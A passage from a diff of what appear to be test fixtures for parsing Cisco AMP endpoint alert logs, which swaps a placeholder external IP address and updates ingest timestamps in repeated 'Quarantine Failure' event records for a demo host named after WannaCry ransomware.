found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:39.764405100Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":812000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine 
Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275399255031906\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -5671,7 +5671,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -5716,7 +5716,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -5726,8 +5726,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025400013Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":297000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275399255031905\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:39.764410300Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":297000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine 
Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275399255031905\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -5747,7 +5747,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -5792,7 +5792,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -5802,8 +5802,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025403940Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":297000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275399255031904\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:39.764416200Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":297000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine 
Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275399255031904\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -5823,7 +5823,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -5868,7 +5868,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -5878,8 +5878,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025406294Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":297000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064606\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:39.764425100Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":297000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine 
Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064606\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -5899,7 +5899,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -5944,7 +5944,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -5954,8 +5954,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025408560Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064605\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:39.764429400Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine 
Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064605\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -5975,7 +5975,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -6020,7 +6020,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -6030,8 +6030,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025411051Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064607\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:39.764433400Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine 
Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064607\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -6051,7 +6051,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -6096,7 +6096,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -6106,8 +6106,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025417712Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064604\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:39.764438300Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine 
Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064604\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -6127,7 +6127,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -6172,7 +6172,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -6182,8 +6182,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025421062Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064603\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:39.764443200Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine 
Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064603\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -6203,7 +6203,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -6248,7 +6248,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -6258,8 +6258,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025423352Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064602\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:39.764448500Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine 
